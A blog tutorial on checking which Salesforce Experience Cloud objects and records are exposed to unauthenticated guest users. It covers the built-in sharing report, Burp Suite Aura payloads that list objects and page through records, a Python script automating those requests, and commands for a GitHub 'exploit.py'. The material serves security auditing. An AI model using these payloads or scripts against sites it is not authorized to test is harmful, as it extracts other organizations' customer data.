In this post we look at how to check which objects and records are visible to guest users on a Salesforce Community (Experience Cloud) site. A community site is a powerful way to connect with your customers, partners, and employees: a branded online space where they can access information, share ideas, collaborate with each other, and submit queries to you as cases. However, as with any platform exposed to the internet, you need to make sure the site does not expose more data to unauthenticated (guest) users than you intend.
Check objects/records visible to guest users
In this blog post, I will show three approaches for checking which objects and records are visible to the site guest user. If you are new to Salesforce Community Sites, start with “A Deep Dive into Salesforce Experience Cloud”.
Prerequisite
- Basic Knowledge of Salesforce.
- Basic Understanding of Burp Suite.
- Basic knowledge of GitHub.
Methods
- Using the Salesforce Guest User Sharing Rule Access Report.
- Using Burp Suite.
- Using GitHub repos.
Salesforce Sharing Rule Access Report
The first approach is to check how many records, and of which objects, are visible to the site guest user. Salesforce generates a report for exactly this purpose. To access it, go to Setup and search for Guest User Sharing Rule Access Report; you will find the link under the Security heading. The report shows, per guest user profile in your org, the objects and the number of records that guest users can access. Use it to audit and review your guest user sharing settings and confirm that they match your business requirements. Keep in mind that it reports record access granted through sharing; object-level permissions (which objects the guest user may read at all) come from the guest user profile, so review both.
[Screenshot of the Guest User Sharing Rule Access Report]
Burp Suite Tool
Burp Suite is a set of tools for web application security testing. It lets you intercept, modify, and analyze the traffic between your browser and the web server, and use that to identify and exploit vulnerabilities such as SQL injection, cross-site scripting, and broken authentication.
With Burp Suite the plan is:
- Find the Community site URL and the guest user profile name.
- Use Burp Repeater (or Burp Intruder, if you want to fuzz object names) to replace the action in an intercepted Aura request with one that lists the objects accessible to the guest user.
- Use Burp Repeater to send a record-retrieval action for each accessible object and read the returned data.
Steps Needed in Burp Suite
- Open Burp Suite and create a temporary project. On the home page, click the Target tab and select Open browser.
- A Chromium tab opens. Enter the URL of the community site and hit Enter. Burp Suite records all your requests and displays them in the Proxy history.
- Select any POST request to the site's Aura endpoint and send it to Repeater: right-click the request and choose “Send to Repeater”, or press Ctrl + R. Then switch to the Repeater tab.
- Copy the value of the `message` parameter from the request body. It is a URL-encoded JSON document listing the Aura actions (controller methods) the page asked the server to run, so we decode it, swap in our own action, and re-encode it.
- Use Burp's Decoder (URL decode) on it and copy the decoded message.
Your decoded message will look like this:
{"actions":[{"id":"213;a","descriptor":"serviceComponent://ui.self.service.components.controller.SupportQuickActionLayoutController/ACTION$getFieldsForQuickActionLayout","callingDescriptor":"UNKNOWN","params":{"quickActionName":"GuestCommunityCase"},"storable":true}]}
Update the descriptor and params so the action calls getConfigData instead:
{"actions":[{"id":"213;a","descriptor":"serviceComponent://ui.force.components.controllers.hostConfig.HostConfigController/ACTION$getConfigData","callingDescriptor":"UNKNOWN","params":{},"storable":true}]}
- URL-encode the updated message in Decoder and copy the encoded result.
- Replace the `message` value in the Repeater request with the new encoded message and press Send. The response contains the list of objects whose records are accessible to the guest user.
- Similarly, to get the records of any accessible object use the message below, replacing the entityNameOrId value with your object's API name. Again, URL-encode the updated message before replacing the `message` value in Repeater.
{"actions":[{"id":"296;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"Account","pageSize":1000,"currentPage":0,"getCount":true,"layoutType":"FULL","enableRowActions":true,"useTimeout":true}}]}
- Press Send. The response contains the records of that object which are accessible to the guest user. Objects that return an error state or an empty result are not exposed; for objects with many records, increase currentPage to page through them.
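The Repeater steps above can be scripted once you have one intercepted Aura request to copy from. The Python below is an added example written for this post, not code from the blog, from the Varonis article referenced below, or from the GitHub repository mentioned in the next section. It builds the same two `message` payloads, form-encodes and decodes them the way Burp's Decoder does, and parses the two responses. The endpoint path, the aura.context values and the response field names (apiNamesToKeyPrefixes for getConfigData, result[].record for getItems) are assumptions to verify against your own intercepted traffic, and the sample responses are constructed so the parsing can be exercised offline.

```python
import json
from urllib.parse import urlencode, parse_qs
from urllib.request import Request, urlopen

# Assumptions for illustration: the endpoint path and the aura.context must be
# copied from the request Burp intercepted (the fwuid has to match the site or
# the server rejects the call).
AURA_ENDPOINT = "https://domain.force.com/path/s/sfsites/aura"
AURA_CONTEXT = {"mode": "PROD", "fwuid": "COPY_FROM_INTERCEPTED_REQUEST",
                "app": "siteforce:communityApp", "loaded": {}, "dn": [],
                "globals": {}, "uad": False}

GET_CONFIG_DATA = ("serviceComponent://ui.force.components.controllers.hostConfig."
                   "HostConfigController/ACTION$getConfigData")
GET_ITEMS = ("serviceComponent://ui.force.components.controllers.lists."
             "selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems")


def build_message(descriptor, params, action_id="1;a"):
    """Build the JSON `message` value in the same shape as the decoded payloads above."""
    action = {"id": action_id, "descriptor": descriptor,
              "callingDescriptor": "UNKNOWN", "params": params}
    return json.dumps({"actions": [action]}, separators=(",", ":"))


def list_objects_message():
    """getConfigData with empty params: lists the objects visible to the caller."""
    return build_message(GET_CONFIG_DATA, {})


def get_items_message(object_name, page=0, page_size=1000):
    """getItems for one object; raise `page` to walk past the first pageSize records."""
    return build_message(GET_ITEMS, {
        "entityNameOrId": object_name, "pageSize": page_size, "currentPage": page,
        "getCount": True, "layoutType": "FULL", "enableRowActions": True,
        "useTimeout": True})


def encode_form(message, token="undefined"):
    """Form-encode the body like the browser does (the post's 'URL encode' step).
    aura.token 'undefined' is what an unauthenticated guest sends (assumption;
    copy whatever your intercepted request carried)."""
    return urlencode({"message": message,
                      "aura.context": json.dumps(AURA_CONTEXT, separators=(",", ":")),
                      "aura.token": token})


def decode_message(form_body):
    """Inverse of encode_form: pull the JSON out of an intercepted body (the 'URL decode' step)."""
    return json.loads(parse_qs(form_body)["message"][0])


def _return_value(response):
    action = response["actions"][0]
    if action.get("state") != "SUCCESS":  # ERROR/INCOMPLETE: not exposed or call rejected
        return {}
    return action.get("returnValue") or {}


def objects_from_config(response):
    """Object API names from a getConfigData response (assumed to be the keys of
    the apiNamesToKeyPrefixes map, API name -> 3-character key prefix)."""
    return sorted(_return_value(response).get("apiNamesToKeyPrefixes", {}))


def records_from_items(response):
    """Record dicts from a getItems response (assumed shape: returnValue.result[].record)."""
    return [row["record"] for row in _return_value(response).get("result", [])]


def call_aura(message):
    """Send one action to the site (network call; not used by the offline samples)."""
    req = Request(AURA_ENDPOINT, data=encode_form(message).encode(),
                  headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urlopen(req, timeout=30) as resp:
        return json.loads(resp.read())


# Constructed sample responses (not real site output) to exercise the parsers.
SAMPLE_CONFIG_RESPONSE = {"actions": [{"id": "1;a", "state": "SUCCESS", "returnValue": {
    "apiNamesToKeyPrefixes": {"Case": "500", "Account": "001", "Contact": "003"}}}]}
SAMPLE_ITEMS_RESPONSE = {"actions": [{"id": "1;a", "state": "SUCCESS", "returnValue": {
    "totalCount": 2, "result": [
        {"record": {"Id": "001000000000001AAA", "Name": "Acme Corp"}},
        {"record": {"Id": "001000000000002AAA", "Name": "Globex"}}]}}]}
SAMPLE_ERROR_RESPONSE = {"actions": [{"id": "1;a", "state": "ERROR",
                                      "error": [{"message": "Invalid entity"}]}]}

if __name__ == "__main__":
    # Live use: objects = objects_from_config(call_aura(list_objects_message()))
    print(objects_from_config(SAMPLE_CONFIG_RESPONSE))
    print(records_from_items(SAMPLE_ITEMS_RESPONSE))
```

Against a live site, call `objects_from_config(call_aura(list_objects_message()))` first and then `records_from_items(call_aura(get_items_message(name)))` for each returned name; an object that comes back with a non-SUCCESS state or an empty result is not exposed to the guest user.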
Reference: https://www.varonis.com/blog/abusing-salesforce-communities
Using Github Repos
There are a number of repositories online that let you test guest user privileges on a Community site.
You can clone this one and experiment with it to check guest user privileges on your site:
https://github.com/moniik/poc_salesforce_lightning.git
Steps
- To extract the list of objects accessible to the guest user, run the following in a terminal:
python3 exploit.py -u https://domain.force.com/path/ -l
- Similarly, to extract the records of one or more objects visible to the guest user, pass their API names with -o:
python3 exploit.py -u https://domain.force.com/path/ -o User Account